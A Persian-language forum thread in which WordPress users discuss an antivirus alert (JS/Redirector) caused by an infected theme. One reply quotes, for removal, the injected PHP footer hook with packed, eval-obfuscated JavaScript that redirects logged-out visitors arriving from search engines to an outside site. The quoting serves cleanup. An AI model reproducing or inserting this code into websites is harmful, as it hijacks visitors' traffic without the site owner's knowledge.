• پایان فعالیت بخشهای انجمن: امکان ایجاد موضوع یا نوشته جدید برای عموم کاربران غیرفعال شده است

وجود یک تروجان در وردپورس

alireza013

Registered User
تاریخ عضویت
3 نوامبر 2009
نوشته‌ها
69
لایک‌ها
4
سلام دوستان.
اخیرا موقع باز کردن برخی صفحات وردپورسم نود ۳۲ این خطا رو میده:

11102858635944611142.jpg


این صفحه خطا توی سایت نود :
http://www.eset.eu/encyclopaedia/js-redirector-nid?lng=en

یه روش گفته شده بود :
دوستان اين مشکل در يک سايت سازمان نيمه دولتي هم اين اتفاق افتاد
و بر طرف کردم
اين ويروس بعد از نصب قالب و دقيقا بعد از لاگين کردن يکي از کاربران که دسترسي مديريتي دارن ويروس فعال ميشه و يک اسکريپتي را در انتهي فايل function.php وارد مي‌کند.
بر طرف کردن اين مشکل:
اسکريپت اضافه (با مقايسه کردن فايل function.php قبل از نصب با بعد از نصبfunction.php ميتوانيد براحتي مشاهده نماييد در انتهاي فايل اضافه مي‌شه) را پاک کنيد سپس در پنل مديريتي هاست خود دسترسي فايل function.php را 444 ست نماييد
مشکل بر طرف ميشه باستون

اما فایل functions.php من هیچ تغییری نکرده.
 

Javacl

Registered User
تاریخ عضویت
28 سپتامبر 2008
نوشته‌ها
2,659
لایک‌ها
1,026
محل سکونت
شادشهر قدیم
قالبتون رو از سایت وردپرس 98 دانلود کردین احتمالا! قالب های اون سایت معمولا این Error رو میده،اگه آره پیشنهاد میدم از جای دیگه دانلود کنید.

//

در مورد ویرس همی افزونه ی " وردپرس ایمن " رو نصب کن تا یادت بدم چیکار کنی ویروس هارو بگیره.
 

Ariota

Registered User
تاریخ عضویت
14 دسامبر 2010
نوشته‌ها
53
لایک‌ها
3
در فایل فانکشن قالب دنبال کد زیر بگردید و حذفش کنید. باید انتهای همه ی کدها باشه:

<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=JavaScript>eval(function(p,a,c,k,e,r)
{e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?
String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--
)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function()
{return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('e
r=x.9,t=,q;4(r.3(m.)!=-1)t=q;4(r.3(7.)!=-1)t=q;4(r.3(8.)!=-1)t=p;4(r.3(a.)!=-1)t=q
;4(r.3(f.)!=-1)t=g;4(r.3(j.)!=-1)t=q;4(t.6&&((q=r.3(?+t+=))!=-1||
(q=r.3(&+t+=))!=-1))B.C=v+w+:/+/A+b+k+5+h.+c+z/s+u+5+h.p+d?+t+y=1&t+i+l=+r.n(q+2+t.6).o(&)
[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|ao
l|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|wind
ow|location'.split('|'),0,{}))</script>";
}
}
}
?>
 
بالا